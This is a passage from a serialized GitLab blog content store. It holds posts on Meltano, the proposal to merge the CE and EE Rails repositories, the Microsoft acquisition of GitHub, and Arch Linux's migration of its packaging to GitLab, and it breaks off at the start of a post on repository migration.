Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n\nCover image by \u003Ca href=\"https://unsplash.com/@beatriz_perez?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText\">Beatriz Pérez Moya\u003C/a> on \u003Ca href=\"https://unsplash.com/photos/XN4T2PVUUgk?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText\">Unsplash\u003C/a>  \n{: .note}\n",[9,267,1099],{"slug":3795,"featured":6,"template":689},"meet-partner-the-good-docs-project","content:en-us:blog:meet-partner-the-good-docs-project.yml","Meet Partner The Good Docs Project","en-us/blog/meet-partner-the-good-docs-project.yml","en-us/blog/meet-partner-the-good-docs-project",{"_path":3801,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3802,"content":3808,"config":3814,"_id":3816,"_type":14,"title":3817,"_source":16,"_file":3818,"_stem":3819,"_extension":19},"/en-us/blog/meltano-follow-up",{"title":3803,"description":3804,"ogTitle":3803,"ogDescription":3804,"noIndex":6,"ogImage":3805,"ogUrl":3806,"ogSiteName":673,"ogType":674,"canonicalUrls":3806,"schema":3807},"Thanks for all the feedback and interest in Meltano!","Last week we introduced Meltano, and we're so excited to be building our community and working with you on our MVP.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678909/Blog/Hero%20Images/thanks-for-all-the-feedback-and-interest-in-meltano.jpg","https://about.gitlab.com/blog/meltano-follow-up","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Thanks for all the feedback and interest in Meltano!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jacob Schatz\"}],\n        \"datePublished\": \"2018-08-07\",\n      }",{"title":3803,"description":3804,"authors":3809,"heroImage":3805,"date":3811,"body":3812,"category":299,"tags":3813},[3810],"Jacob 
Schatz","2018-08-07","\nWe recently wrote a [post introducing Meltano](/blog/hey-data-teams-we-are-working-on-a-tool-just-for-you/), an open source tool that will help data teams version control everything from raw data to visualization. We were blown away by the level of interest it received, including all sorts of comments on [Hacker News](https://news.ycombinator.com/item?id=17667399) that gave us a ton of feedback we’re excited to wrestle with and work towards. Special thanks to commenter [slap_shot](https://news.ycombinator.com/item?id=17668089), whose comments prompted us to hop on YouTube for a live conversation. We learned that in real life, slap_shot is a data and analytics engineer and founder named Brett, and you can watch our live chat here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/F8tEDq3K_pE\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nBrett told us something we suspected after our own experience of assembling our analytics stack – that pretty much every data team he encounters is using a \"multitude of internal processes that are broken and cobbled together for data integration, or they're not comfortable with the pricing and sales process for some of these products.\"\n\nWhen we started researching tools for our team, the goal was to use only open source. Unfortunately, the best open source that we could find wasn't up to the task for us, and changing the code proved cumbersome due to licensing issues. We settled on Looker, a fantastic (but proprietary) solution for visualization, and began reluctantly building out other parts ourselves. Brett told us the idea of an open source version of Looker could be really promising – it's too expensive for many teams, including, to some extent, our own. 
We think it doesn't make sense to build a dashboard and not be able to share it with the whole team.\n\nSid shares, \"We spent months assembling our data pipeline... but all these choices were so hard, and I think there's room for a convention over configuration framework, where you type in your Salesforce API keys and you get the proper Salesforce graphs. We want to get as close as possible to that experience.\"\n\n### Issues and next steps\n\n*  The Meltano team is building a set of very common core extractors, including Salesforce, Marketo, Zendesk, etc. This way we can hopefully provide a few of the most important sources out of the box, and substantial initial value. Then, being an open source product, we hope others can contribute and increase the breadth of support.\n*  The data team is going to try to apply Meltano to a machine learning project, probably around predicting probability of winning a sales opportunity, so we can incorporate any requirements specific to ML.\n\n### Q&A\n\n#### Give me the short and sweet version – what does Meltano do?\n\n[Meltano helps](https://gitlab.com/meltano/meltano/#roadmap) companies consolidate, organize, and analyze their data to make better business decisions.\n\n#### Can the BI tool and integration library be used outside of GitLab?\n\nWe're not sure yet. For now, the integration part (which we call orchestration) is GitLab CI-based. We recently had the idea to have a frontend \"production mode,\" where you can at least see everything, and maybe we'll have a \"development mode\" where you can run different pipelines inside a Python Flask app.\n\n#### Embulk and Singer built the core foundation and they allow people to build their own integrations, do we envision similar model?\n\nYes. 
Right now we are prioritizing getting the architecture and tooling correct, to make it easy for us and others to build additional extractors.\n\n#### What's the vision for the monorepo and what are the benefits?\n\nWe consolidated all of the code for Meltano in a single project, to make it easier to develop and contribute to. We then provide two Meltano Docker images, similar to Jupyter notebook layering: a standard image which contains all of the default extractors and loaders, as well as a base image so users can customize it to contain only what they need. `meltano/analytics` is both a prototypical Meltano implementation and the repo for GitLab Analytics.\n\n#### Would I *have* to use Meltano for everything?\n\nNo! We know teams have different needs and preferences, so you would be able to pick and choose the features that you use.\n\n#### I'd like to see GitLab CI have a clean API for others to plug into. Do you see that happening?\n\nThe Data team is committed to using GitLab CI as our orchestration platform. [Airflow](https://airflow.apache.org/) is state of the art right now, but we think we can have similar or better features within CI. If appropriate, the Meltano team will contribute back to CI to make it better too. Some features we're excited about would be better statistics across jobs, sub-pipelines and directed acyclic graphs of jobs, and intelligent data backfill support.\n\n#### This sounds really ambitious, and there are a lot of companies in the data integration space.\n\nYou're completely right! But there isn't an open source tool that checks all these boxes. It might sound a bit ludicrous, but as Sid says, \"When I saw GitLab for the first time, it made sense that something you collaborate on is also something you contribute to... 
it makes sense to me that it's not an individual burden, it's a shared burden.\" We think that the shared nature of the problem will make for a great open source community, and without that community, this won't really get off the ground.\n\nPhoto by [Ludovic Toinel](https://unsplash.com/photos/nGwyaWKFRVI) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[803,9],{"slug":3815,"featured":6,"template":689},"meltano-follow-up","content:en-us:blog:meltano-follow-up.yml","Meltano Follow Up","en-us/blog/meltano-follow-up.yml","en-us/blog/meltano-follow-up",{"_path":3821,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3822,"content":3827,"config":3833,"_id":3835,"_type":14,"title":3836,"_source":16,"_file":3837,"_stem":3838,"_extension":19},"/en-us/blog/merging-ce-and-ee-codebases",{"title":3823,"description":3824,"ogTitle":3823,"ogDescription":3824,"noIndex":6,"ogImage":792,"ogUrl":3825,"ogSiteName":673,"ogType":674,"canonicalUrls":3825,"schema":3826},"GitLab might move to a single Rails codebase","We're considering moving towards a single Rails repository by combining the two existing repositories – here's why, and what would change.","https://about.gitlab.com/blog/merging-ce-and-ee-codebases","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab might move to a single Rails codebase\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Marin Jankovski\"}],\n        \"datePublished\": \"2019-02-21\",\n      }",{"title":3823,"description":3824,"authors":3828,"heroImage":792,"date":3830,"body":3831,"category":801,"tags":3832},[3829],"Marin Jankovski","2019-02-21","\n\n## A single repository with no license changes\n\nBefore we go into the details of the proposed changes, we want to stress that:\n\n* GitLab Community Edition code would remain open source and MIT licensed.\n* GitLab Enterprise Edition code would remain source available and proprietary.\n\n## What are the 
challenges with having two repositories?\n\nCurrently the Ruby on Rails code of GitLab (the majority of the codebase) are maintained in two repositories.\nThe [gitlab-ce] repository for the code with an open source license and the [gitlab-ee] repository containing code with a proprietary license which is source available.\n\nFeature development is difficult and error prone when making any change at GitLab in two similar yet separate repositories that depend on one another.\n\nBelow are a few examples to demonstrate the problem:\n\n### Duplicated work during feature development\n\nThis [frontend only Merge Request](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/7376) required a [backport to CE repository](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/22158). Backporting included creating duplicate work to avoid future conflicts as well as changes to the code to support the feature.\n\n### A simple change can break master\n\nA simple [change in a spec in CE repository](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24801)\nfailed the [pipeline in the master branch](https://gitlab.com/gitlab-org/gitlab-ee/issues/9621). After hours of investigation, an [MR reverting the change](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24961) was created, as well as a [second to address the problem](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24983).\n\n### Conflicts during preparation for regular releases\n\n This concerns preparation for a regular release, e.g. [11.7.5 release](https://gitlab.com/gitlab-org/release/tasks/issues/659). Merge requests preparing the release for both the [CE repository](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24941) and [EE repository](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/9441) need to be created and once the pipelines pass, the EE repository requires a merge from the CE repository. 
This causes additional conflicts, pipeline failures, and similar delays requiring more manual intervention during which the CE distribution release is also delayed.\n\nBetween these three examples, _days_ of engineering time has been spent on [busy work], delaying the delivery of work that brings actual value. Only three examples are highlighted, but this type of work occurs daily.\nWhether writing a new feature available in Core, or any of the enterprise plans, all are equally affected.\n\nMore details on the workflows and challenges can be found in the [working in CE and EE codebases blueprint] document.\n\n## What have we done to improve the situation?\n\nWe've invested significant development time to try and keep the two repositories separate:\n\n### Pre-2016: Manual merges for each release\n\n Prior to 2016, merging the CE repository into the EE repository was done when we were ready to cut a release; the number of commits was small so this could be done by one person.\n\n### 2016-2017: Daily merges by a team of developers\n\nIn 2016, the number of commits between the two repositories grew so the task was divided between seven (brave) developers responsible for merging the code once a day. This worked for a while until delays started happening due to failed specs or difficult merge conflicts.\n\n### 2017-2018: Automated merges every three hours\n\nAt the end of 2017, we merged an [MR that allowed the creation of automated MRs between the two repositories](https://gitlab.com/gitlab-org/release-tools/merge_requests/86), mentioning individuals to resolve conflicts. This task ran every three hours, allowing for a smaller number of commits to be worked on. 
You can read more about our [automated CE to EE merge here](/blog/using-gitlab-ci-to-build-gitlab-faster/).\n\n### Present: Further automation with Merge Train\n\nBy the end of 2018, the number of changes going into both the CE and EE repositories grew to thousands of commits in some cases, which made the automated MR insufficient. The [Merge Train](https://gitlab.com/gitlab-org/merge-train) tool was created to automate these workflows further, by automatically rejecting merge conflicts and preferring changes from one repository over the other. The edge cases we've encountered are requiring us to invest additional time in improving the custom tool.\n\nThis last attempt turned out to be a bit of a crossroads. Do we invest more development time in improving the custom tooling, knowing that we will never get it 100 percent right, or do we need to take some more drastic measures that are going to save countless hours of development time?\n\n## What are we proposing?\n\nOne of GitLab's core [values] is efficiency. As previously mentioned, merging the [gitlab-ce] Rails repository into the [gitlab-ee] Rails repository is proving to be inefficient.\n\nThe Rails repository is one of many base repositories of which GitLab consists. The [gitlab-ce] repository is a part of a [gitlab-ce distribution] package which offers only the Core [feature set]. Similarly, the [gitlab-ee] repository is part of a [gitlab-ee distribution] package which has a larger feature set available. See the image below:\n\n![CE-EE-Before](https://about.gitlab.com/images/blogimages/merging-ce-and-ee-codebases/community-enterprise-before.png){: .medium.center}\n\nThe change we are proposing would merge the [gitlab-ce] and [gitlab-ee] repositories into a single [gitlab] repository. 
This change is reflected below:\n\n![CE-EE-After](https://about.gitlab.com/images/blogimages/merging-ce-and-ee-codebases/community-enterprise-after.png){: .medium.center}\n\nThe [design for merging two codebases] outlines the required work and process changes in detail. The proposed change would pertain only to the Ruby on Rails repository, and I've summarized it below.\n\n### So, what changes?\n\n* The [gitlab-ce] and [gitlab-ee] repositories are replaced with a single [gitlab] repository, with all open issues and merge requests moved into the single repository.\n* All frontend assets (JavaScript, CSS, images, views) will be open sourced under the MIT license.\n* All proprietary backend code is located in the `/ee` repository.\n* All documentation is merged together and clearly states which features belong to which [feature set]. Documentation is [already licensed under CC-BY-SA](https://gitlab.com/gitlab-org/gitlab-ce/issues/42891).\n\n### What remains unchanged?\n\n* The [gitlab-ce distribution] package remains fully open source under the same license.\n* All code outside of the `/ee` directory in the single [gitlab] repository is open source.\n* All code in the `/ee` directory remains proprietary with source code available.\n* Other projects, such as [gitlab-shell], [gitaly], [gitlab-workhorse], [gitlab-pages], remain unchanged.\n\n### What are the possible downsides?\n\nWe want to be clear about the possible downsides of this approach:\n\n* Users with installations from source currently cloning the [gitlab-ce] repository would download from a new repository named [gitlab]. The clone will also fetch the proprietary code in `/ee` directory, but removing this directory has no effect on running application.\n\n     ➡️ This is resolved by removing the `/ee` directory after cloning.\n* [gitlab-ce distribution] users would get more database tables because of the new tables in `db/schema.rb`. 
Database schema is open source and in the [gitlab-ce distribution] these new tables would not be populated, affect performance, or take significant space.\n\n     ➡️ All database migration code is open source and does not add additional maintenance burden, so no additional work is required.\n\n## What's next?\n\nWe currently think that the efficiency gains and clearer naming outweighs these disadvantages. Our [stewardship of GitLab](/company/stewardship/) is an important aspect of GitLab's success as a whole, so we would love to know:\n\n* Is there a better way to accomplish to solve the problem of the [busy work]?\n* What improvements can we make to our proposal?\n* Are there any additional considerations that we should take into account?\n\nWe invite you to share your suggestions in [issue 2952](https://gitlab.com/gitlab-org/gitlab-ee/issues/2952), which was an inspiration for the proposal as it currently stands. We look forward to hearing your thoughts!\n\nCover image from [Unsplash](https://images.unsplash.com/photo-1512217536414-d92543c79ca1)\n{: .note}\n\n[values]: https://handbook.gitlab.com/handbook/values/\n[gitlab-ce]: https://gitlab.com/gitlab-org/gitlab-ce\n[gitlab-ce distribution]: https://packages.gitlab.com/gitlab/gitlab-ce\n[gitlab-ee distribution]: https://packages.gitlab.com/gitlab/gitlab-ee\n[gitlab-ee]: https://gitlab.com/gitlab-org/gitlab-ee\n[gitlab]: https://gitlab.com/gitlab-org/gitlab\n[gitlab-shell]: https://gitlab.com/gitlab-org/gitlab-shell\n[gitaly]: https://gitlab.com/gitlab-org/gitaly\n[gitlab-workhorse]: https://gitlab.com/gitlab-org/gitlab-workhorse\n[gitlab-pages]: https://gitlab.com/gitlab-org/gitlab-pages\n[feature set]: /pricing/feature-comparison/\n[busy work]: https://en.wikipedia.org/wiki/Busy_work\n[working in CE and EE codebases blueprint]: https://gitlab.com/gitlab-com/gl-infra/readiness/-/tree/master/library/ce-ee-codebases\n[design for merging two codebases]: 
https://gitlab.com/gitlab-com/gl-infra/readiness/-/tree/master/library/merge-ce-ee-codebases\n",[803,267,277,9],{"slug":3834,"featured":6,"template":689},"merging-ce-and-ee-codebases","content:en-us:blog:merging-ce-and-ee-codebases.yml","Merging Ce And Ee Codebases","en-us/blog/merging-ce-and-ee-codebases.yml","en-us/blog/merging-ce-and-ee-codebases",{"_path":3840,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3841,"content":3847,"config":3852,"_id":3854,"_type":14,"title":3855,"_source":16,"_file":3856,"_stem":3857,"_extension":19},"/en-us/blog/microsoft-acquires-github",{"title":3842,"description":3843,"ogTitle":3842,"ogDescription":3843,"noIndex":6,"ogImage":3844,"ogUrl":3845,"ogSiteName":673,"ogType":674,"canonicalUrls":3845,"schema":3846},"Congratulations GitHub on the acquisition by Microsoft","The acquisition of GitHub by Microsoft is validation of the growing influence of software developers in the world.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680101/Blog/Hero%20Images/github-news-cover.png","https://about.gitlab.com/blog/microsoft-acquires-github","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Congratulations GitHub on the acquisition by Microsoft\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-06-03\",\n      }",{"title":3842,"description":3843,"authors":3848,"heroImage":3844,"date":3849,"body":3850,"category":10,"tags":3851},[970],"2018-06-03","\n\nCongratulations to GitHub on their [acquisition by Microsoft](https://www.bloomberg.com/news/articles/2018-06-03/microsoft-is-said-to-have-agreed-to-acquire-coding-site-github)! This is validation of the growing influence of software developers in the world, and the importance of [modern DevOps](/topics/devops/). The software community owes a lot to GitHub, and that includes the GitLab community. 
GitLab was first developed on GitHub and found its first contributors through it.\n\n## Code collaboration before GitHub\n\nOver the years, code collaboration has come a long way. Many developers will remember how code was often hosted on private websites, FTP servers, email, and IRC. We used to stuff a floppy disk or CD-ROM with code and mail it back and forth, or send patches to newsgroups or mailing lists in order to share and work on code together. It was a painful, error-prone time.\n\nGit, the [version control system](/topics/version-control/) used by GitHub, GitLab, and others, was first introduced in 2005. It allowed developers to work asynchronously, across the globe, on the same code. GitWeb went a step further, with its web interface for browsing a Git repository, including viewing contents of files, commit messages, and more.\n\nSourceForge offered the first glimpse of modern code collaboration by offering a central location to host and manage free, open source projects. Despite limited functionality and a cumbersome UI, SourceForge started bringing developers together in one place.\n\nEach step along the way improved the developer experience, allowed more people to contribute, and sped up the software development lifecycle.\n\n## A common place for code\n\nGitHub launched in 2008. While Git version control was a starting point for better code collaboration, GitHub made it even easier. By applying modern communication features inspired by social media sites, GitHub empowered social coding. 
It provided the first truly accessible UI to manage and review feature branches, and the ability to merge them with one-click “Pull Requests.” As a result, open source projects flocked to GitHub as a place to not only host code, but to grow a community as well.\n\n\u003Cdiv class=\"row\">\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/git-instaweb.png\" alt=\"GitWeb user interface\">\n\u003C/div>\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/github-ui.png\" alt=\"GitHub user interface\">\n\u003C/div>\n\u003Cdiv class=\"col-md-12 text-center\" style=\"margin-top: 5px\">\n\u003Cem>\u003Csmall>GitHub’s UI made it easier to manage and review feature branches compared to its predecessor, GitWeb.\u003C/small>\u003C/em>\n\u003C/div>\n\u003C/div>\n\n## What does the Microsoft acquisition mean for the industry?\n\nThe growing influence of software developers cannot be overstated. Developers are the [new kingmakers](https://thenewkingmakers.com/) and their influence within organizations is growing along with their value.\n\nGitHub has earned mindshare within the developer community, and Microsoft’s acquisition is certainly an attempt to garner and cultivate that mindshare. However, the long-term strategic implication seems to be that Microsoft wants to use GitHub as a means to drive Azure adoption.\n\nDeveloper tools have a high capacity for driving cloud usage. Once you have your application code hosted, the natural next step is to need a place to deploy it. Today, Microsoft fosters cloud adoption by tightly coupling Azure, its cloud service, together with Microsoft Visual Studio Team Services (VSTS), its set of development tools. 
Microsoft will likely integrate GitHub into VSTS in order to take advantage of the strong tie with Azure.\n\n> *“The way developers produce, deliver and maintain code has changed significantly in the last ten years and we applaud GitHub for being a driving force supporting the vast independent developer community through this evolution. This acquisition affirms the global importance of software developers and their influence in the enterprise. Microsoft likely acquired GitHub so it could more closely integrate it with Microsoft Visual Studio Team Services (VSTS) and ultimately help drive compute usage for Azure.” - [Sid Sijbrandij](/company/team/#sytses), GitLab CEO*\n\n## How does this relate to GitLab?\n\nWe applaud GitHub on its accomplishments and congratulate Microsoft on its acquisition. While we admire what's been done, our strategy differs in two key areas. First, instead of integrating multiple tools together, we believe a [single application](/handbook/product/single-application/), built from the ground up to support the entire DevOps lifecycle, is a better experience leading to a faster cycle time. Second, it’s important to us that the [core of our product always remain open source](/blog/gitlab-is-open-core-github-is-closed-source/) itself as well. Being “open core” means everyone can build the tools together. Having it all in a single application means everyone can use the same tool to collaborate together. 
We see the next evolution of software development as a world where everyone can contribute.\n",[9,930,751],{"slug":3853,"featured":6,"template":689},"microsoft-acquires-github","content:en-us:blog:microsoft-acquires-github.yml","Microsoft Acquires Github","en-us/blog/microsoft-acquires-github.yml","en-us/blog/microsoft-acquires-github",{"_path":3859,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3860,"content":3865,"config":3871,"_id":3873,"_type":14,"title":3874,"_source":16,"_file":3875,"_stem":3876,"_extension":19},"/en-us/blog/migrating-arch-linux-packaging-infrastructure-gitlab",{"title":3861,"description":3862,"ogTitle":3861,"ogDescription":3862,"noIndex":6,"ogImage":1733,"ogUrl":3863,"ogSiteName":673,"ogType":674,"canonicalUrls":3863,"schema":3864},"Migrating Arch Linux's packaging infrastructure to GitLab","Arch Linux developer Levente Polyak explains how the project recently migrated its packaging infrastructure to GitLab and what Arch Linux gained as a result.","https://about.gitlab.com/blog/migrating-arch-linux-packaging-infrastructure-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Migrating Arch Linux's packaging infrastructure to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Levente Polyak\"}],\n        \"datePublished\": \"2023-09-11\",\n      }",{"title":3861,"description":3862,"authors":3866,"heroImage":1733,"date":3868,"body":3869,"category":10,"tags":3870},[3867],"Levente Polyak","2023-09-11","\nThree years ago, the Arch Linux community began a migration to the GitLab DevSecOps Platform to modernize our software development tooling and processes.\nWe recently announced a major moment on that journey: [migrating our entire packaging toolchain to Git and GitLab](https://archlinux.org/news/git-migration-completed/).\nThis move completely reshaped our packaging workflow, tooling, and storage — the very backbone of our package 
creation process.\n\nThe move has been pivotal for our continued success as a project.\nOur [package repositories](https://archlinux.org/packages/) contain nearly 14,000 packages at the time of this writing, and [GitLab's collaborative features](/pricing/feature-comparison/) empower our package maintainers to seamlessly collaborate, promoting efficient and effective teamwork.\nUsing GitLab as a central platform also enhances visibility across the project.\nWe can now effortlessly trace the history of changes, collaborate on enhancements and bugs, and follow the evolution of each package — all in a single place.\n\n> [Join GitLab at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about our dedication to open source.\n\nI'm a devoted free open source software engineer and currently have the privilege of serving as the project leader of Arch Linux.\nIn this article, I'll explain how and why we undertook this complex, but ultimately worthwhile, endeavor.\n\n## Understanding Arch Linux's infrastructure\nTo understand the complexity of this migration, you'll first need to understand the history of Arch's infrastructure.\n\nCentral to our distribution are our [PKGBUILD](https://wiki.archlinux.org/title/PKGBUILD) packaging sources, which are the essential blueprints that shape each package installable with [pacman](https://archlinux.org/pacman/) from our official repositories. Previously, our [packaging infrastructure](https://wiki.archlinux.org/title/Creating_packages) relied on [Subversion](https://subversion.apache.org/) for managing our packaging sources.\n\nFor more than a decade of [Arch Linux's development](https://archlinux.org/releng/releases/), Subversion served as a reliable companion for working with our packaging source code. 
However, the open source software development landscape has transformed significantly since the advent of the Arch Linux project; technologies have advanced and collaboration dynamics have evolved (note, for example, the popularization of [DevOps](https://about.gitlab.com/topics/devops/) processes and practices).\n\nRecognizing the need to adapt and optimize, we started a journey that would shape the future of how members of the Arch Linux community work together. To enhance collaboration and pave the way for future improvements to Arch, we decided to undertake migration of our packaging sources to individual Git repositories, and we chose to host them with GitLab.\n\n## Migrating 14,000 Arch Linux packages\nThis would be no small task.\nCurrently, the Arch Linux community maintains 13,930 installable packages, all of which are now managed in 12,138 individual Git repositories.\nBut we knew the benefits would be worth the effort involved in such an enormous migration.\n\nFor example, one of the standout advantages of Git is its ability to empower packagers with a new level of insight into their work.\nThe ease of inspecting local history would become a game-changer, especially as packaging evolved into a collective effort, with multiple maintainers collaborating to refine and enhance individual packages (Subversion requires a client-server connection to inspect the history).\n\nBut the decision to migrate was not just about adopting Git.\nIt also reflected our aspiration to provide our community with an environment that fosters extensive collaboration. 
Our history with Subversion had shown its limitations in this regard (more on that in a moment).\nThe synergy between Git packaging repositories and the GitLab platform was evident; it opened doors to enhanced collaboration, offered powerful version control features, and laid the groundwork for more efficient packaging processes.\n\nThe migration of Arch Linux's packaging infrastructure to GitLab was the pinnacle of several factors aligning perfectly.\nThe need for a more robust collaboration platform, the growing prominence of Git, and the desire to utilize the benefits of modern version control converged to make this move a natural progression for Arch.\n\nWe decided it was time to get it done.\n\n## Three years and a weekend\nArch Linux has been gradually adopting and migrating operations to GitLab over the course of three years.\nExtending that migration to our packaging infrastructure was the next vital step of the process — and the pivotal moment of switching to GitLab hosting and workflow for packaging occurred within [the span of a single weekend](https://archlinux.org/news/git-migration-announcement/).\n\nA change of this magnitude touches the very core of our distribution, and it was only possible with thorough, meticulous preparation.\nFor weeks, our migration team diligently crafted [a runbook](https://md.archlinux.org/utjjQ-bQTsipIKntPrpf8g#) that ensured every major aspect and change were considered, minimizing risk and boosting our confidence.\n\nWhen our concentrated migration effort began, the migration team focused entirely on this rollout, everyone collaborating in a [Jitsi](https://meet.jit.si/) video call with screen sharing.\nThe strategic choice of a weekend for performing the migration aligned perfectly with our volunteer-driven community, offering sufficient time for a buffer and quick resolution to any unforeseen hiccups.\n\nThe first challenge was transferring our extensive Subversion history to GitLab. 
For some time, we had been running `git-svn` with a timer to be able to provide some packaging history to another repository.\nOur [custom tooling](https://gitlab.archlinux.org/archlinux/arch-svn-package-to-git/) made use of `git-svn` imports, which was a gigantic monorepo containing all packages as individual branches.\n\nOur migration solution was a carefully crafted script that used [git-filter-repo](https://github.com/newren/git-filter-repo), of which we could run several instances in parallel and which also supported the ability to convert only repositories that changed since the last run (determined by deltas).\nThe script also filtered history, commit messages, rewrote author data to incorporate our GitLab user handles, filtered unwanted files, and more.\nAdditionally, we tagged all previous releases where we could determine the origin of the exact commit.\n\nBut the migration wasn't confined to a mere transfer of Subversion history to GitLab; it involved revisiting workflows, tools, and all software that interacted *with* the version control system.\nFrom redefining workflows to embracing new tools, every step was vital to ensuring that Arch Linux developed in a coherent way.\n\nWe also wanted to seize the moment as an opportunity to reimagine and revamp package maintainer tooling.\nSo we also created [pkgctl](https://man.archlinux.org/man/pkgctl.1.en), a modern interface that not only refreshed and streamlined our tooling but also enhanced user and contributor experience.\n\nFortunately, the entire migration flowed seamlessly.\nBy the end of the weekend, we had succeeded.\n\n## Benefits of a journey with GitLab\nOur packaging migration was the latest milestone in Arch Linux's overall journey with GitLab.\nMigrating our packaging infrastructure to GitLab allows us to maximize and enjoy those improvements even more.\n\nSince the Arch Linux community began [migrating to GitLab in 
2020](https://gitlab.com/gitlab-com/marketing/developer-relations/open-source-program/gitlab-open-source-partners/community-support/-/issues/11), Arch maintainers and contributors have enjoyed a significantly improved experience interacting with and contributing to the project.\nThe advantages not only enhance our current workflows but also open up exciting possibilities for the future.\n\nHere's a rundown of the benefits we've seen from our overall migration so far.\n\n### Deeper collaboration\nBefore the migration, for example, lack of a dedicated collaborative platform for our packaging sources posed challenges to both users and package maintainers. While [Flyspray](https://wiki.archlinux.org/title/Flyspray), our bug tracker, was valuable, its scope was limited to tracking issues rather than facilitating meaningful collaboration.\nProposed changes were often submitted as patch files in attachments, resulting in a cumbersome experience for users suggesting improvements and maintainers reviewing these changes.\n\nThe process of iterating through these patch files was tedious because we lacked the ability to comment on specific lines (not to mention the ability to discuss diverse sub-topics in individual threads).\n\nToday, GitLab's standard [merge request](https://docs.gitlab.com/ee/user/project/merge_requests/) feature has improved this process dramatically. It helps us collaborate smoothly, allowing [threaded discussions](https://docs.gitlab.com/ee/user/discussions/index.html), precise comments, and [code suggestions](https://docs.gitlab.com/ee/user/project/merge_requests/reviews/suggestions.html) on individual code segments. Although merge requests are a simple, staple feature, their impact on streamlining our processes is invaluable, serving as the bedrock of GitLab's collaborative strength.\n\nThe ability to seamlessly integrate issue tracking and merge requests within the same platform fosters a more cohesive and efficient workflow for our entire community. 
We're looking forward to tracking and managing packaging-related issues, bugs, and enhancements directly within GitLab soon.\n\n### Better automation\nOur use of [GitLab CI/CD](https://docs.gitlab.com/ee/ci/) has played a crucial role in automating our development work across our software projects.\n\nWe utilize CI/CD pipelines for everything from running tests to auditing dependencies—even publishing release artifacts, such as Rust crates, automatically using a tag pipeline. The efficiency we gain through this functionality is invaluable for ensuring the integrity and quality of our projects. We've realized some security improvements, too. Automating our usage of dependencies means we become aware of tracked security issues in our software projects used dependencies via commit pipelines, as well as scheduled pipelines (so we can bump and potentially deploy/release our software projects in case its necessary).\n\n### Stronger community\nAdopting GitLab has helped us better serve our community. The [Service Desk feature](https://docs.gitlab.com/ee/user/project/service_desk/) has emerged as a game-changer, offering a streamlined channel to manage specific user requests.\nThis integration with GitLab enhances the workflow without sacrificing overview.\n\nAnd recently, we've significantly increased our use of [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/).\nWe rely on Pages for publishing documentation, monthly reports, our Web Key Directory and static sites, and we're enthusiastic about expanding its application in the future.\n\n## More than new tools\nArch Linux's migration wasn't just about adopting the latest tools. 
Our motivation for migrating — and the positive consequences of the upgrade — reflect the values of open source communities like ours, where working together is essential for moving forward.\nBy adopting GitLab, Arch Linux is improving our project's overall atmosphere, creating a space where contributions are welcomed, reviewed, and integrated more easily, and in a way that conforms to contemporary best practices.\n\nWe're proud to be [GitLab Open Source Partners](https://go.gitlab.com/BM5JwV), and we extend our gratitude to GitLab for providing a platform that seamlessly aligns with our vision.\n\n[Join GitLab at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about our dedication to open source.\n{: .note}\n",[9,267,1099],{"slug":3872,"featured":6,"template":689},"migrating-arch-linux-packaging-infrastructure-gitlab","content:en-us:blog:migrating-arch-linux-packaging-infrastructure-gitlab.yml","Migrating Arch Linux Packaging Infrastructure Gitlab","en-us/blog/migrating-arch-linux-packaging-infrastructure-gitlab.yml","en-us/blog/migrating-arch-linux-packaging-infrastructure-gitlab",{"_path":3878,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3879,"content":3884,"config":3890,"_id":3892,"_type":14,"title":3893,"_source":16,"_file":3894,"_stem":3895,"_extension":19},"/en-us/blog/migrating-repositories-to-gitlab-just-became-easier",{"title":3880,"description":3881,"ogTitle":3880,"ogDescription":3881,"noIndex":6,"ogImage":1407,"ogUrl":3882,"ogSiteName":673,"ogType":674,"canonicalUrls":3882,"schema":3883},"Migrating repositories to GitLab just became easier","Automate data and user migration into GitLab using open core software Congregate.","https://about.gitlab.com/blog/migrating-repositories-to-gitlab-just-became-easier","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Migrating repositories to GitLab just became easier\",\n        \"author\": 
